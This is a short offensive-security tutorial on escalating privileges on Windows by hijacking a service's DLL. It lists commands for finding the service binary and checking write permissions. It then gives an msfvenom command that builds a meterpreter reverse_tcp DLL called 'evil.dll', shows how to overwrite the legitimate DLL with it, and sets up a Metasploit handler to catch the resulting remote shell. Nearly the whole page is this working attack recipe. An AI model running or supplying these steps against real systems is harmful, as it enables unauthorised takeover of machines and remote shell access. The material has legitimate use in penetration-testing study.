Windows PrivEsc with DLL Hijacking
Last modified: 2024-04-01
If we found running services using netstat or Get-Process, identify the executable that service is running and reversing the file. If the executable loads some DLL, we can overwrite the DLL to execute arbitrary code.
1. Enumerate Services (Processes)
At first, list running processes and find interesting ones.
2. Identify the Service
sc qc "example-service"
With the command above, we can see the path of the executable which runs the process.
To see what DLLs are loaded on the executable, disassemble/decompile it with strings
command, WinDbg
, x64dbg
, or online tools such as Decompiler Explorer
3. Check Write Permission of DLL
Find the DLL file on target machine, then check if we have write permission for the file.
icacls \path\to\example.dll
4. Create Malicious DLL
If we have write permission, we can override the .dll
So create a malicious DLL using msfvenom
in local machine:
# Replace with your local ip
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f dll -o evil.dll
After generating our evil.dll
, replace the original DLL with this on target machine:
cp evil.dll \path\to\example.dll
Now start a TCP listener in local machine.
msf> use exploit/multi/handler
msf> set payload windows/x64/meterpreter/reverse_tcp
# Replace with your ip
msf> set lhost
msf> set lport 4444
msf> run
When the service runs, our malicious DLL is loaded and the payload is executed.
We may get a shell.